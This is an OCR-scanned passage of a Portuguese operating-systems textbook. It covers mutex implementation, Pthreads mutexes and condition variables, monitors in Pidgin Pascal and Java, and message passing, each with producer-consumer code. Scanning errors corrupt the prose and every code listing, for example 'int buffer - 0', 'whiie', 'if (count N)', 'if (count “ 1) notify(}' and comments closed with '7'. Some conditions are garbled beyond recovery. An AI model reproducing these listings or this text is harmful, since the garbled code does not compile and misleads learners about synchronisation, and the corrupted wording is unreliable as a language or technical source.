threadjykld para que abra mao da CPU em favor de outro 
thread. Consequememente, nao ha espera ocupada. Quan- 
do executar na próxima vez, o thread verificara a variavel 
de trava novamente. 

O threadjyiddt muito rapido, poise apenasuma chama - 
da do escalonador de threads no espaęo do usuario. Como 
consequenria, nem muiex_iock nem mutex_unlock reąuerem 


qualquer chamada ao nudeo. Usando-as, threads de usua- 
rio podem sineronizar totalmenie dentro do espaęo de usua¬ 
rio, com rotinas que exigem somente algumas instruęoes. 

O sistema mutex que descrevemos anieriormenie e 
um conjunto mmimo de chamadas. Para todo software ha 
sempre urna exigencia por aperfeięoamemos, e o caso das 
primitivas de sincronizaęao nao e exceęao. Por exemplo, 
algumas vezes um pacote de thread oferece uma chamada 
mutex_trylock que obtem a variavel de trava on retorna um 
código de falha sem bioquear. Essa chamada da ao thread 
a flexibiłidade de deddir o que fazer se houver alternativas 
a apenas esperar. 

Ale agora nao tratamos de um determinado tópico, 
mas e melhor expiicita-lo* Com o pacote de threads no 
espaęo de usuario, nao ha problema de existirem multi- 
plos threads com acesso ao mesmo mutex, ja que todos os 
threads operam em um espaęo de endercęamcnto comnm. 
Com u do, como a maioria das soluęoes a n terier es — como 
o algoriuno de Petersem e os semaforos —, ha uma lupo- 
tese, nao comentada, dc que mdltiplos proccssos lenham 
acesso a pelo menos alguma memória compartilhada, tal- 
vez somente a uma unita pa)avra na memória, mas pelo 
menos alguma. Se os proccssos possufrem espaęos dc ende- 
rcęamento disjuntos, conforme temosdiio insistemememe, 
como des poderiam compartilhar a variavel tum no algo- 
ritmo de Peterson, ou os sem a for os, ou um buffer comum? 

Ha duas respostas. Primeiro, algumas das estruturas de 
dados compartilhadas, como os semaforos, podem ser ar- 
mazenadas no niicleo c somente ter seu acesso dispomvd 
via chamadas dc sistema. Essc metodo climina o problema. 
Em segundo, a maioria dos sistemas opcracionais moder- 
nos {induindo UNIX e Windows) oferece indos para que 
proccssos compartilbem alguma parle de seus espaęos dc 
endereęamento com outros proccssos. Desse modo, buffers 
e o u tras estruturas de dados podem ser compariilhados. Em 
um caso extremo, em que nada rnais e posśwel, pode-se 
usar um arquivo compartiIliado. 

Sc dois ou mais proccssos comparti I ha rem a maior par¬ 
le ou a totalidade do espaęo de endereęamento, a dislinęao 
entre proccssos e ihreads terna-se algo difusa, mas ainda 
preseme. Dois processos que companilham um espaęo de 


mutex_lock; 

TSL REGISTER,MUTEX 
CMP REGISTER,#0 
JZE ok 

GALL thread_yield 
JMP mutex_lock 
ok: RET 


| copia mutex para o registrador e atribui a ele o valor 1 
j o mutex era zero? 

| se era zero, o mutex estava desimpedEdo, portanto retorne 
| o mutex esta ocupado; escalone um outro thread 
| tent© novamente mais tarde 
] retorna a quem chamou; entrou na regiao critica 


mutex_unlock: 

MOVE MUTEX,#0 
RET 


| coloca 0 em mutex 
1 retorna a quem chamou 


I Figura 2.24 Implementaęao do mutexJock e do mutex_untock . 
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endereęamento comum ainda tem arquivos aberios dife- 
rentes, temporizadores de a lar me e o u tras propriedades 
por processo, enquanto os threads dentro de um iinico pro¬ 
cesso compartilham todas as propriedades. fi sempre valida 
a afirmaęao de que multiplos processos que compartilham 
um espaęo dc cndcrcęamcnto comum nunca tem a cfid.cn- 
da dc threads dc usuario, pois o nudeo estara pro fu n da - 
menie cnvolvido no gcrenriamcmo dcsscs processos, 

Mutexes em pthreads 

Os Pihreads fornecem varias funęoes que podem ser 
usadas para sincronizar threads. O mecanismo basico usa 
urna variavel mutex, que pode ser travada on destravada, 
para protegercada regiao cntica, Um thread que ąueira cn- 
trar cm urna regiao critica primciro lenta travar o mutex 
assodado* Se o mutex estiver destravado, o thread pode 
entrar imediatamente c nma trava e estabdecida atomica- 
menie, evitando que outros threads enirem. Se o mutex ja 
estiver iravado, o thread que chama e bloąueado a te que 
ele seja destravado. Se multiplos threads esta o esperando 
pelo mesmo mmex, quando ele for destravado, apenas um 
deles e autorizado a continuar e uava-lo novamente. Essas 
travas nao sao obrigatórias* Cabe ao programador assegu- 
rar que os threads os utilizem correramente. 

As principais chamadas relacionadas a mutexes sao 
mostradas na Tabela 2,6. Como era de se espera r, eles po¬ 
dem ser criados e destnudos. As chamadas para exeauar 
essas operaęóes sao pthread_mukx_inh e pthread_mukx_ 
destroy, respectiva menie. Eles tambem podem ser travados 
por pthread_mutex_bck — que lenta conquisrar a trava e e 
Moqueado, se o mutex ja estiver impedido. Tambem ha a 
opęao de tentar travar um tmnex c falhar com um código 
de erro em vez dc bloquea-lo, se deja estiver bloqueado. 
Essa cha ma da e pth readjn u texjrybch, Essa cha ma da per- 
mite que um thread entre em espera caso seja necessario. 
Por hm, pthread_mutex_unbck ocupada um mutex e libera 
eJcatarrierue um iliread se um ou mais estiverem esperando 
por ele. Os mmexes tambem podem ter atributos, mas es- 
ses sao usados apenas para objetivos especializados. 

Alem dos mmexes, os Pthreads ofercccm um segun- 
do mecanismo de sincronizaęao: variaveis de condięao. 
Os rmiicxes sao uteis para permitir ou bloąuear o acesso a 


Chamada de thread 

Descrięao 

p thread jnutex init 

Cria um mutex 

pthread mutex„destroy 

Destrói um mutex existente 

pthread mutex lcK: k 

Conqu ista u ma trava ou bloqueio 

pthread.mutex trylook 

Conquista uma lrava o u fal ha 

pthread_mut ex_u n loc k 

Libera uma trava 


I Tabela 2.6 Afgumas chamadas de Pthreads relacionadas a 
I mutexes. 


urna regiao cruica. As variaveis de condięao permitem que 
os threads bloqueiem em virtude de alguma condięao nao 
satisfeita. Quase sempre os dois metodos sao usados jun- 
tos, Examinemos agora em maiores detalhes a imeraęao dc 
threads, mutexes c variavcis de condięao. 

Considere novamerue o exemplo simples da situaęao 
produtor-consumidor: um thread coloca coisas em um 
buffer e outro as retira. Se o produtor descobrir que nao 
ha mais espaęo disponwel no buffer, ele deve bloquear ale 
que algum se torne disponivel. Os mutexes permitem fazer 
a verificaęao automaticamente sem interferenria de outros 
threads, mas, dian te da dcscoberta dc quc o buffer esta chcio, 
o produtor prerisa dc urna mancira para bloqucar c desper- 
tar mais tardc. fi isso quc as vartavcis dc condięao permitem* 

Algumas das chamadas relacionadas as variaveis de 
condięao sao mostradas na Tabela 2,7. Como voce prova- 
vdmcnte ja espcrava, ha chamadas para criar c destruir 
variaveis dc condięao. Elas podem ter atributos e ha varias 
chamadas para administra-las (nao mostradas). As opera- 
ęoes principais dc variaveis dc condięao sao ptlmad_cond_ 
wali z pthr?ad_cond_$i 0 naŁ A piimcira bloqueia o thread quc 
chama atć que algum outro thread sinalize (usando a ultima 
chamada)* fi claro que as razbes para bloquear e esperar nao 
sao parte do protocolo de espera e sinalizaęao. O thread blo- 
queado muiias vezes esta esperando que o thread que sinaliza 
faęa algum trabalho, libere algum recursoou execute alguma 
outra atividade. Somentc depois disso o thread que blo- 
queia pode prosseguir. As variaveis de condięao permitem 
que essa espera e bloqudo sejam fcitos atonii ca me mc. A 
cha mada pthmid^condji roadcast e usa da q u a udo potcncial- 
mente ha multiplos threads bloąueados c esperando pclo 
mesmo sina I, 

Variaveis de condięao e mutexes sao sempre usados 
em conjunlo. O padrao e um thread travar um mutex e 
entao esperar por urna variavel condidonal quando nao 
puder obter o que prccisa. Eventualmente, outro thread 
sinalizara e ele pode continuar, O pthrcad_cond_waii chama 
atomicamente c dcstrava atomicamcntc o niutcx que esta 
controlando, Poi essa razao, o mutex c um dos para met ros* 


Chamada de thread 

Descrięao 

pthread condJrit 

Cria uma variavel de concfięio 

pthread cond destroy 

Destrói uma variavel de condięao 

pthread cond wait 

Bloqueio esperando por um sinal 

pth read_cond_sig nal 

Sinaliza para outro thread e o 
desperta 

pthread_cond_broadcast 

Sinaliza para multiplos threads e 
desperta todos eles 


I Ta beta 2*7 Algumas chamadas de Pthreads relacionadas a 
variaveis de condięao. 
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Ś imporiante observar tambem que as variaveis de 
cbndięao (a diferenęa dos semafor os) na o icm memória, Se 
urn smal e enviado para urna variivel de condięao pela qual 
nenhum iliread esta esperando, o sinal e perdido. Os pro- 
gramadores devem ser cuidadosos para nao perder sinais. 

Como exemplo do modo como mutexes e variaveis de 
condięao sao usados, a Figura 2.25 mostra nm problema de 
consumidor-produlor mnilo simples com imi unico buffer. 
Quando o produtor tiver enebido o buffer, cle deve esperar 
ale qne o consumidor o esvazie a mes de gerar o próximo 
item. De modo semclhante, ąuando o consumidor !ivcr rc- 
movido um iłem, cle dcve esperar atc que o produtor ic- 


nha gerado omro. Hmbora seja muiio simples, esse exem- 
plo i lustra os niecą nismos bas i. cos. O co ma udo quc coloca 
um thread para dorrnir sempre deveria veribcar a condięao 
para assegurar que da seja satisfeita antes de prosseguir, 
visto que o ihread poderia ter sido desperiado etn virtude 
de um sina! do UNIX on por alguma o utrą razao* 

23-71 Mon Stores 

Com o uso de semaforos c mutexes, a comunicaęao en- 
tre processos parccc facil, nao c? Yoce ainda nao viu nada! 
Obscrve com basta me atcnęao a ordem dos downs a mes de 


#include <stdio,h> 

#include <pthread.h> 

#define MAX 1000000000 
pthread_mutex_t the_mutex; 
pthread_cond_t condc, condp; 
int buffer - 0; 


/* quanto$ numeros produzir 7 

/* usado para sinalizaęao 7 

/* buffer usado entre produtor e consumidor 7 


void *producer(void *ptr) /* dados do produtor 7 

{ int i; 


for (i= 1; i <= MAX; i++) { 

pthread. mutex Jock(&the_ mutex); /* obtem acesso exclusivo ao buffer 7 
whiie (buffer != 0) pthrea d_cond_wait(&condp, &the_mutex); 
buffer = i; /* poe item no buffer 7 

płhread_cond_signal(&condc); f* acorda consumidor 7 
pthread_mutex_unlock(8ithe_mutex);/* libera acesso ao buffer 7 

} 

pthread, exit(Q); 

} 


void *consumer(void *ptr) /* dados do consumidor 7 

{ int i; 

for (i = 1; i<= MAX; i++) { 

pthread_mutexJock(&the_mutex); f* obtem acesso exclusivo ao buffer 7 
whife (buffer ==0 ) pfhread_cond_wait(&condc, &the_mutex); 
buffer = 0; /* retire o item do buffer 7 

pthread_cond_signal(&condp); /* acorda o produtor 7 
pfhread_mutex_unlock(&the_nnutex);/* libera acesso ao buffer 7 

} 

pthrea d _ ex i t(0); 

} 


int mainfint arge, char **argv) 

{ 

pthread_t pro, eon; 

pthrea d _ m utex _ i n it(&th e _ mutex „ 0); 

pthread_cond Jnit(&condc F 0); 

pthread^cond... initf&condp, 0); 

pthread_create(&con, 0, consumer, 0); 

pthread_create(&pro, 0, producer, 0); 

pthread.joinfpro, 0); 

pthread_join(con, 0); 

pthrea d _ co nd _ d e stroy (&co nd c); 

pthmad _ co nd d estroy (& co nd p); 

pthread_mutex_destroy(&the_mutex); 

} 


I Figura 2,25 Usando Ihreads para resolver o problema produtor-consumidor. 
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inserir on remover os itens do buffer na Figura 2.23. Supo- 
nha que os dois downs, no código do produ tor, estivessem 
inyertidos, de modo que o mutex seria decrescido antes de 
vazio em vez de dcpois dele. Se o buffer estivcsse completa- 
mcntc cheio, o produtor seria bloqucado com mutex cm 0. 
Conscqucntcmcmc, na vez scguinte cm que o consumidor 
tcntassc ter accsso ao buffer, faria urn down no mutex, agora 
em 0, e seria bloąueado tambem. Ambosos processos perma - 
neceriam etemammte bloqueados e mmca mais funciona- 
riam, Essa simaęao infeliz e ehamada de impasse {deadlock), 
Estudaremos os impasses em detalhes jio Capfuilo 6. 

Esse problema foi Ievantado para mostrar o cuidado 
que se dcvc ter no uso dc semaloros. Urn crro sutil pode 
por tu do a perder. Ć como programar cm linguagem as- 
senibly — on atć piór, pois os erros sao condięoes dc corri¬ 
da, impasses e outras modos de comportamento imprevisi- 
vel e irreprodutwel 

Para facilitar a escrita correla de program as, Hoare 
(1974) e Brinch Hanscn (1973) propuseram unia unidade 
basica dc siiicronizaęao dc alto mvd ehamada monitor. 
As propostas delcs cram urn po u co diferentes, eon f ornie 
vcrcmos a seguir. Um monitor e unia coleęao de rot i nas, 
variavds e estru i u ras de dados, tu do isso agrupado em um 
lipo especial de módulo on pacote. Os processos podem 
cha mar as rot i nas em um monitor quando q u i serem, mas 
nao podem ter acesso direto as estruturas internas de dados 
a o monitor a panir de rotinas dedaradas fora dele. A Figu¬ 
ra 2.26 ilustra um monitor escrito em unia linguagem ima- 
ginaria, a Pascal Pidgin. C nao pode ser usada nqui porque 
os monitores sao um conccito dc linguagem e C nao os tem. 

Os monitores apresemam unia propriedade importante 
que os torna uieis para realizar a exdusao mutua: someme 
um processo pode estar ativo em um monitor em um da do 
moment o. O monitor e urna construęao da linguagem de 
programami o e, port anto, os compiladores sabeni que des 
sao especiais e, por isso, tratam as chamadas a rotinas do 
monitor dc modo diferente de outras chamadas dc protedi- 
mento* Em geral, quando urn processo chama urna rotina 

monitor example 
integer i; 
condition c; 

proceduro producer(); 


end: 

procedurę consumerf ); 

end; 

end monitor; 

1 Figura 2.26 Um monitor. 


do monitor, algumas das primeiras instruęoes da rotina ve- 
rificarao se qualquer oulro processo esta atualmente ativo 
dentro do monitor. Se estiver, o processo que cliamou sera 
suspenso ate que o omro processo dcixe o monitor. Se ne- 
nhum omro processo cstiycr nsando o monitor, o processo 
quc cliamou podera entrar. 

Cabe ao compilador implememar a exdusao mutua 
nas entradas do monitor, mas um modo comum ć usar um 
mutex ou um semafora binario. Como e o compilador e 
nao o programador que providencia a exclusao mutua, e 
mnito menos provavd que algo de errado. De qualquer 
maneira, quem codifica o monitor nao precisa saber como 
o compilador implememou a exclusao mutua. Basta saber 
quc, convertendo todas as regioes crfticas em rotinas do 
monitor, dois processos nimca cxccutarao suas regioes cri- 
ticas ao mesmo tempo, 

Embora nionUores ofereęam um modo facil de fazer a 
exclusao mutua (como vimos ameriormenie), isso nao e o 
basiante. & preciso tambem um modo de b!oquear processos 
quando nao pudereni continuar. No problema produtor- 
-consumidor, e muito facil colocar todos os testes de buffer 
cheio c buffer vazio nas rotinas do monitor, mas como o pro¬ 
dutor seria b]oqueadoquandoe]eencontrasse o buffer cheio? 

A soluęao esta na introduęao de variavei$ condicio- 
nais, com duas operaęoes sobre elas: wait e srgnal. Quando 
uma rotina do monitor descobre que nao pode prosseguir 
(por cxcmplo, o produtor pcrccbc que o bufferesta cheio), 
executa um wait sobre alguma variavel condicional — por 
exemplo, che w. Essa aęao resulta no bloqueio do processo 
que esta chamando. Ela tambem permite que outro pro¬ 
cesso anteriormente proibido de entrar no monitor agora 
emre, Yimos variaveis dc condięao e cssas operaęoes no 
contexto de Ptlireads anteriormente. 

Esse outro processo — por exemplo, o consumidor — 
pode acordar seu parceiro adormecido a panir da emissao 
dc um signal para a variavcl condicional que seu parcci- 
ro esta esperarido, Para evitar que dois processos perma- 
neęam no monitor ao mesmo tempo, precisamos de uma 
regra que determine o que acontece depois de um signaL 
Hoare propos deixar o processo recem-acordado executar r 
suspendendo o outro, Brinch Hanscn sugeriu uma mancira 
astma de resolver o problema: extgir que um processo que 
emitir um signal saia do monitor imediatamente. Em outras 
paiavras, um comando signal só podera aparecer como o 
ultimo comando dc uma rotina do monitor, Usaremos a 
p rop osia de Brinch Hanscn porque ela ć conceiiualmente 
mais simplcs c tambem mais facil dc implemcntar. Sc um 
signal e emitido sobre urna variavd condicional pela qual 
varios processos estejam esperando, somentc um ddes, de- 
tenninado pelo escalonador do sistema, e despertado. 

£ preciso mcncionar que ha uma tcrccira soluęao quc 
nao foi proposta por Hoare nem por Brinch Hansem Essa 
soluęao deixa o emissor do sinal prosseguir sua execuęao e 
permite ao processo cm espera comcęar a cxeciiiar somen- 
te depois que o emissor do sina] tenha safdo do monitor. 
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Variaveis condicionais nao sao comadores. Elas nao 
acumulam smais para usa-los depois, como fazem os se- 
maforos. Assim, se uma variavel condicional lor sinalizada 
sem ninguem estar esperando pcio smal, este ficara perdb 
do para semprc. Em outras palavras, wait dcve vir amcs do 
signal. Essa regra torna a implementaęao muito mais sim- 
plcs. Na pratica nao t um probkma, pois e facii manier o 
contro k do estado dc ca da proccsso com variavds, sc for 
necessario, Um processo capaz dc cmi lir um srgnal pode 
perceber, a pariir da verifkaęao das variaveis H que essa ope~ 
raęao nao e nece ssana. 

Um csquckto do problcma produtor-consumidor com 
monitores ć mostrado na Figura 227 cm urna linguagem 
imaginaria, a Pascal Pidgin. A vantagcm dc usar Pascal Pid- 
gin ć que da c pura, simplcs e segtie exatamente o model o 
dc Hoare/Brinch Hansen, 

Vocc pode estar pensando que as operaędes wait e signal 
sao pareddas com as operaędes sleep e wakeup, que vimos 
anteriormente ao tratar das condięoes de corrida lat ais, 

mon itor ProducerConsumer 
condition fu!}, empty; 
integ er count, 

proce d u re insert(item:integer); 

begin 

if count- Afthen wait (fuli); 
insertJtem(item); 
count:= count +1; 
if count= /then s\gna\(empty) 

end; 

fun ct i o nremo ve:in teger; 

begin 

if count= Othen wait (empty); 
remove ~remove_item; 
count:- count- 1; 
if count= N-1 then signal (ful!) 

end 

count- O; 

end monitor; 

p roc e du re producer; 

begin 

whilefruedo 

begin 

iłem = producentem; 

ProducerConsumer insert(item) 

end 

end; 

procedurę consumer; 

begin 

whilefruedo 

begin 

item = ProducerConsumer remove; 
consume_ item(item) 

end 

end; 

I Figura 2.27 Um esqueleto do problema produtor-consu¬ 
midor com monitores. Somente urna rotina esta ativa por vez 
no monitor. O buffer tem N lugares. 


Elas sao muito similares, mas apresentam uma diferenęa 
fundamental: sleep e wakeup fal ha ram porque, enquanto 
um processo estava tentami o ir dormir, o outro tentava 
acorda-lo. Com monitores, isso nao acontece, A exclusao 
miitua a ut oma lica das rotinas do monitor garante, por 
exemplo, quc f sc o produtor dentro dc uma rodna do mo- 
niloi descobrir quc o buffer esta chcio, esse produtor sera 
capaz de terminar a opcraęao wait sem sc preocupar com 
a possibilidadc de o escalonador chavear para o consumi- 
dor um pouco ames de wait terminar. O consumidor nem 
mesmo sera permitido dentro do monitor ale que wait te- 
nha terminado e o produtor tenha sido marca do como nao 
mais executavel. 

Em bora a Fascal Fidgin seja uma linguagem imagina¬ 
ria, algumas linguagens de programaęao reais lambem dao 
su porte a monitores, ernbora nem semprc eon formę o pro- 
jetado por Hoarc c Brinch Hansem Urna dessas linguagens 
e Java. Esta e uma linguagem orientada a objetos que dao 
su porte a threads de u su ario e Lambem permite que me- 
todos (rotinas) sejam agrupados cm elasses, Adicionando- 
-sc a palavra-chave synchronized h dc da raęao de um meto¬ 
do, Java garante que, uma vez intciado qualquer ihread 
executando aquele metodo, a nenluim outro thread sera 
permitido exccutar qualquer outro mćtodo synchronized 
naquela classe, 

Uma soluęao para o problema produtor-comumi- 
dor com basc no uso dc moniiores em Java e mostrada 
na Figura 2.2S. A soluęao e constitntda de quatro elasses, 
A dasse mais cxterna, ProducerConsmner, cria c i nicią dois 
threads, pę c, A segunda e a terccira dasse, producer e con¬ 
sumer t respeciiyamenie, contern o código para o produtor 
c o eon su midor. Por firn, a dasse ourjnonifor ć o monitor; 
cla comem dois threads sineronizados que sao usados, na 
vcrdade, para inserir elementos no buffer compartilhado 
e lira-los de la. Diferememente dos exemplos anteriores, 
agora mostramos o código com pieto para insert c remove. 

Os threads produtor e consumidor sao fundoiialmen- 
te identicos a sens correspondentes em todos os nossos 
exemplos anteriores. O produtor possui u ni faęo infinito 
que gera dados e os poe no buffer comnm. o consumidor 
tem igualmeme um laęo infinito, que lira dados do buffer 
comuni c faz algo util com clc. 

A parte imeressanie desse programa e a cbissc our_ 
monitor, que contern o buffer, as variaveis de administraęao 
e dois metodos sineronizados. Quando esta aiivo dentro 
do insert o produtor sabc com certeza que o consumidor 
nao pode estar ativo dentro do remów, tornando seguras as 
atualizaęoes das variaveis e do buffer sem o te mor das con- 
dięoes dc corrida. A variavel count contro la o mi mero de 
iteus quc estao no buffer Ela pode assiunii qualquer valor 
entre 0 e N- i inclusive, A variavel Japonia para um lugar 
do buffer que contern o próximo item a ser buscado. Da 
mesma maneira, hi aponta para um lugar do buffer ondc o 
próxiniQ item sera colocado. Ć permitido que b = hi, o quc 
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public class ProducerConsumer { 

static finał int N = 100 ff constante com o tamanbo do buffer 
static producer p = new producer(); // inst&rtcia de um novo thread produtor 
static consumer c = new consumer();// instancja de um novo thread consumidor 
static our_monitor mon = new our_monitor(); // inst^ncia de urn novo monitor 

public static void main(String args[|) { 

р. start{}; ff i nicią o thread produtor 

с. starte); // i nicią o thread consumidor 

} 

static class producer extends Thread { 

public void run() {ff o rnśtodo run contćm o código do thread 
int item; 

while (true) ( // lago do produtor 

item = produce Jłem(); 
mon. insert (item); 

} 

} 

private int produce_item{) { ... } ff realmente produz 

} 

static class consumer extends Thread { 
public vofd run(} (mótodo run contbm o código do- thread 
int item; 

while (true) { ff lago do consumidor 
item = mon.remove(); 
consume item (item); 

} 

i 

private void consume itemfint iłem) {...}// realmente consome 

} 

static class our_monitor {// este ś o monitor 
private int bufferf] = new int[N); 

private int count = O Jo = O, hi = 0; ff contadores e indices 

public syn chroń i zed void insert(int val) ( 

if (count N) go_to_sleep(); ff se o buffer e$tiver cheio, vś dormir 

buffer [hi] - val; ff insere urn item no buffer 

hi = (hi + 1) % N; ff lugar para colocar o próximo item 

count = count +1; ff mais um item no buffer agora 

if (count “ 1) notify(}: // se o consumidor estava dormindo, acorde-o 

i 

public synchronized int remove() { 
int val; 

if (count == 0) go_to_sfeep(); ff se o buffer esłiver vazio, vó dormir 

vai - buffer [lo]; ff busca um item no buffer 

lo - (lo + 1} % N; ff lugar de onde buscar o próximo item 

count = count - 1; ff um item a menos no buffer 

if (count == N - 1) notify{); // se o produtor estava dormindo, acorde-o 

return val; 

} 

private void go_to_sleep() {try{wait{);) catchfInterruptedException exc) {};} 

} 

j 

1 Figura 2.28 Uma soluęao para o problem a produlor-consumidor em Java. 


signiJiea qiic 0 item oti Nilem esiao no buffer. O va!or dc 
count indica qual desses ca sos ocorrc. 

Metodos sineronizados clii Java sao essenrialmente 
diferentes dos monitores dassicos: Java nao tern variaveis 
condicionais. Em vcz disso, ela oferece dois metodos, wait 
c notify r cquivalcntes a sleep c wakmp, cxccto que, quando 
usados dentro de metodos sineronizados, nao estao sujcitos 
as condięóes de corrida. Tcoricamcnte, o metodo wait pode 
serinterrompido — que e o papci do código que o envo!ve. 


Java requer que o trata men to de exceęoes seja explidio. 
Para nosso p rop osi to, imagine apenas que pojojkep seja o 
ca min ho para ir dormir 

Tornando automatica a exclusao miitua das regióes 
criticas, os monitores deixam a programaęao paralela miii- 
to menos sujeita a erios qne com semaforos. Ainda assim 
cles tambem tern alguns probleinas. Nao e a toa que nos- 
sos dois excmplos de monitores cslavam escritos cm Pascal 
Pidgin c em Java — em vez de C, como os oulros exemplos 
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desie livro. Conforme fol mencionado anterionnente, os 
monitores sao urn conceito de linguagem de programaęao. 
O compilador deve reconhece-los e organiza-los para a ex- 
cltisao mutua de alguma maneira. C, Pascal c a maioria das 
outras linguagem nao possucm monitores; portanto, nao 
c razoavd cspcrar quc sens compi lad ores imponham al¬ 
go ma regra dc cxdusao mutua. Na verdadc, como poderia 
o compilador saber a te mesmo quais rotinas estavam nos 
monitores e quais nao estavam? 

Essas mesmas lingnagens nao apresentam semaforos, 
mas incku-los e Eacil; tndo o que vocc predsa fazer ć adido- 
nar a biblioteca duas pcąuenas rotinas, cm código de lin¬ 
guagem assembly, a Sm de cmttir as cha ma das de sistema 
up e down. Os compiladores nem seqner predsam saber que 
elas existem. Obviamcme, os sistemas operadonals pred¬ 
sam ser informados sobre os semaforos, mas, caso se tenha 
urn sistema operacional baseado em semaforos, e possfve! 
ainda escrcvcr os program as dc u su ario para de cm C ou 
C-H- {ou atć mesmo cm linguagem assembly sc vocć for 
masoąuista o subdeme). Para os monitores, voce predsa 
de urna linguagem qtie os tenha construfdo, 

Outro problema com monitores e tambem com sema¬ 
foros e quc des foram projetados para resolver o problema 
da exclusao mutua em u ma ou mais CPUs, todas com accsso 
a urna memória comum. Pondo os ścinaloros na memória 
compar li Iliada e protegendo-os com as instruęoes TSU ou 
XCHG, podemos evitar disputas. Quando vamos para urn sis¬ 
tema distribiudo forma do por multiplas CPUs, cada qual com 
sua própria memória piwada c conectada por urna rede local, 
essas primitivas tomam-se inaplicaveis. A conciusao e que os 
semaforos sao de nfvd muito baixo c os monitores nao sao 
uteis, excelo para algumas lingnagens dc programaęao. Alcm 
disso, nenhuma dessas primitivas permile troca de i n forma- 
ęóes entre as maąuinas, Algo difereme se faz necessario. 

23.81 Troca de mensagens 

Esse algo diferente e a troca de inensagens (message 
passim]). Esse metodo dc comunicaęao entre processos usa 
duas primitivas, send c receive, que, assim como os semaforos 
mas diferentemente dos monitores, sao chamadas de siste¬ 
ma e nao construędes dc linguagem. Dessa maneira, das po- 
dem ser fa cii menie colocadas em rotinas de biblioteca, como 

sendfdestination, &message); 
e 

receive(source, &message); 

A primeira chamada eiivia uma mensagem para um 
dado destino; a segunda recebc uma mensagem de uma 
da da origem (ou dc uma origem qualqiicr, sc o receptor 
nao se importar), Se nenhuma mensagem cstiver dispo- 
nfvel, o receptor podera fi car bloqueado atć que alguma 
mensagem eheguc, Como aliernativa H de pocie reiornar 
imediata menie acompanhado de um código de erro. 


Projeto de sistemas de troca de mensagens 

Sistemas de troca de mensagens apresentam muiios 
problemas complexos e dificuldades de projeto que nao 
ocorrem com semaforos ou monitores — espedalmente se 
os processos comunicantes esttverem em maąninas dife- 
rentes conectadas por uma rede. Por exemplo, as mensa- 
gens podcm ser perdidas pela rede. Para se prcvenir contra 
mensagens perdidas, o cmissor c o receptor podcm com- 
binar qne, assim quc uma mensagem tenha sido rcccbi- 
da, o receptor enviara dc volla uma mensagem especial dc 
confirmaęao de recebimento {acknowkdgmmt). Se o 
cmissor nao tiver recebido a confirmaęao de recebimento 
dentro de um certo imenalo de tempo, ele retransmitira a 
mensagem. 

Agora, pense no que acontece se a própria mensagem 
for rccebida corre ta menie, mas a confirmaęao dc rccebi- 
menlo liver sido perdida. O cmissor retransmitira a men¬ 
sagem e, porta ino, o receptor a recebera duas vezes. E 
fundaniemal que o receptor seja capaz de distinguir entre 
uma mensagem nova e a reiran.smi.ssao de uma mensagem 
antiga. Normalnienie, esse problema e resolvido median¬ 
ie a colocaęao dc numeros em uma sequenda consecuti- 
va em cada mensagem odginaL Se o receptor obtem uma 
mensagem que carregue o mesmo nu mero sequendal de 
uma mensagem anterior, ele sabe que a mensagem e uma 
duplicata que pode ser ignorada. A comunicaęao betn-su- 
ccdida dianie dc irocas tle mensagens nao confiaveis ć urna 
importante parte do estudo sobre redes de computadores. 
Para mais informaęócs, veja Tanenbanm (1996), 

Os sistemas de mensagens tambem predsam lidar com 
a ąuestao dos nonies dos processos, para que o processo 
espedficado em uma chamada send ou receive nao seja am- 
bfguo. A autenticaęao tambem e um tópico de sistemas 
de mensagens: como o diente pode saber que esta se co- 
municando com o senddor de arquivos real e nao com um 
impostor? 

Na outra ponta do espectro, ha ainda topi cos de proje- 
to que sao im porta ntes quando o emissor e o receptor estao 
na mesma maquina. Um desses tópicos e o desempenho. 
Copiar mensagens de um processo para outro e sempre 
mais lento que realizar urna operaęao de semaforo ou en- 
trar em um monitor. Muito se tern fet to para tor nar a troca 
de mensagens eficiente. Chcriton (1984), por exemp!o r su- 
geriu um tamanho de mensagem limitado, quc caiba nos 
registradores das maquinas, para entao serem realizadas as 
Irocas dc mensagens com o uso dos registradores. 

O problema produtor-consumidor com troca 
de mensagens 

Agora vcjamos como o problema produtor-comumi- 
dor pode ser rcsolvido com a troca dc mensagens c sem 
qualqucr memória compartilhada. Uma soluęao possfvd 
ć mostrada na Figura 2,29, Partimos do press u po sto de 
que todas as mensagens sao do mesmo tamanho e qne as 
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tdefine N 100 


i* numero de lugares no buffer 7 


void producer(void) 

{ 

i ot item; 
message m; 

whiJe (TRUE) { 

item = produce Jtem(); 
receive(consumer, &m); 
buiid_message(&m f item); 
send{consumer, &m); 

} 

} 

void consumer(void) 

{ 

int item, i; 
message m; 


f* buffer de mensagens 7 


t gera atguma coisa para cofocar no buffer 7 
T espera que uma mensagem vazia chegue 7 
r monta uma mensagem para enviar 7 
r envia item para consumidor 7 


for (i = 0; \ < N; i++) sendfproducen &m}; /* envia N mensagens vazias 7 


while (TRUE) { 

receive(producer f &m); 
item = extract_item(&m); 
send(producer, Sm); 
consume_item(item); 

} 


f* pega mensagem contendo item 7 
/* extrai o item da mensagem 7 
f* envia a mensagem vazia como resposta 7 
r faz afguma coisa com o item 7 


I Figura 2,29 O problem a produtor-oonsumidor com N mensagens. 


mensagens ciwiadas, mas ainda nao recebidas, Sao arma- 
zenadas automaticamcnlc pelo sistema opcradonaL Nessa 
soluęao, c usado urn Lotal dc N mensagens, analogamente 
a os A ; lugares no buffer cm urna memória compartilhada, 
0 consumidor comeęa etwiando N mensagens vazias para 
o produtor. Se iiver algum item para forneeer ao eonsmni- 
dor, o produtor pegara urna mensagem vazia e enviara de 
voUa uma mensagem cheia. Desse modo, o numero total 
de mensagens no sistema pcrmanece constame com o de- 
correr do tempo, c assim das po dem ser armazenadas em 
uma ąuantidade de memória previanieme conhedda, 

Se o produtor irabalhar mais rapido que o consumidor 
todas as mensagens serao prccnchidas, a espera do consu- 
midor; o produtor sera bloąueado, aguardando que urna 
mensagem vazia volte. Se o consumidor irabalhar rnais rapi¬ 
do, entao acomecera o iiwerso: todas as mensagens estarao 
vazias esperando que o produtor as preencha; o consumi- 
dor sera bloąueado, esperando por uma mensagem cheia. 

Ha miiiias variaęoes possfaeis do mecamstno de troca 
de mensagens. Para comcęar, obscrvemos como as mensa¬ 
gens sao endereęadas. Urn meio para isso e airibuir a ca da 
processo um endereęo unlco e fazer as mensagens serem 
cndcrcęadasaos processos. Um outro modo ć invenlar uma 
nova estrutura de dados, cha mada caixa postał, Uma cai- 
xa postał e um local para armazenar lemporariamenie um 
certo numero de mensagens, normaJmente espedfkado 
quando da e criada. Quando as eaixas postais sao usadas, 


os parameiros de endereęo nas chamadas send e receiye sao 
